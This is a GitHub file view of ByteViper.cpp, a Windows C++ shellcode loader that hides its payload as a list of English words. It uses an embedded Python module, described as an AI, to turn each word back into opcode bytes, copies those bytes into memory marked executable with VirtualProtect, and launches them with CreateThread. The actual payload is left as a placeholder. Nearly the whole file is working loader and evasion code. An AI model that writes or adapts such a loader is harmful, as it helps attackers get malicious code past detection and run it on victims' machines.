-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathByteViper.cpp
More file actions
77 lines (57 loc) · 2.11 KB
/
ByteViper.cpp
File metadata and controls
77 lines (57 loc) · 2.11 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "C:\\mingw64\\opt\\include\\python3.11\\Python.h"
/*
Example paylod that is taken from payload-generator. Note: This is not a working payload, its just for representational purposes.
unsigned char *eng_words[] = {"governessdom","yggdrasil","fala","steatorrhoea","grandee","kathryn","lamping","strutting""fauvism"};
*/
// Your payload goes below
unsigned char *eng_words[] = <Your payload with curly brackets>
int main(void) {
void * payload_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
rv = VirtualProtect(eng_words, sizeof(eng_words), PAGE_EXECUTE_READWRITE, &oldprotect);
Py_Initialize();
PyObject *name, *func, *load_module, *args, *callfunc;
printf("\nConnecting to AI...\n");
name = PyUnicode_FromString((char*)"payload");
load_module = PyImport_Import(name);
func = PyObject_GetAttrString(load_module,(char*)"getopcode");
void *startPtr = &eng_words[0];
void *currentPointer = &eng_words[0];
unsigned char* opc;
char* token;
unsigned char result;
int arr_count = sizeof(eng_words)/sizeof(eng_words[0]);
printf("Fetching Payload! Hold on to your butts...\n");
for (int count=0; count < arr_count; count++){
args = PyTuple_Pack(1, PyUnicode_FromString(eng_words[count]));
callfunc = PyObject_CallObject(func, args);
opc = _PyUnicode_AsString(callfunc);
token = strtok(opc, "|");
while(token != NULL) {
result = (unsigned char)strtol(token, NULL, 16);
RtlMoveMemory(currentPointer, &result, sizeof(result));
currentPointer = currentPointer + sizeof(result);
token = strtok(NULL, "|");
}
}
unsigned char null_byte = {0x00};
RtlMoveMemory(currentPointer, &null_byte, sizeof(null_byte));
Py_Finalize();
printf("Executing Payload...Boom\n");
if ( rv != 0 ) {
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) startPtr, 0, 0, 0);
DWORD result = WaitForSingleObject(th, -1);
if (result == WAIT_FAILED) {
DWORD error = GetLastError();
printf("%d", error);
}
}
printf("Exiting...\n");
return 0;
}